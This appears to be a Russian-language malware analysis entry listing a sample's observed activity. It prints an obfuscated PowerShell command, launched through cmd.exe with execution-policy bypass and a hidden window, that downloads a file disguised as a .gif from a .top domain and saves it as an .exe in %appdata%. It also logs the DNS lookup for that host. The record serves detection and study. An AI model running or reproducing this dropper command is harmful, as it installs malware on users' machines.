Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWersHelL.ExE -exECUTiOnPOliCY bYPaSS -noPROFile -winDOwStyLE HiDden (New-oBjeCt sySTEM.NET.weBclIENT).dowNloAdfile('http://www.vopergooda.top/read.php?f=1.gif','%APpDATa%.exE');S...
- DNS ASK vo###gooda.top
- '<SYSTEM32>\cmd.exe' /c "POWersHelL.ExE -exECUTiOnPOliCY bYPaSS -noPROFile -winDOwStyLE HiDden (New-oBjeCt sySTEM.NET.weBclIENT).dowNloAdfile('http://www.vopergooda.top/read.php?f=1.gif','%APpDATa%.exE');S...' (со скрытым окном)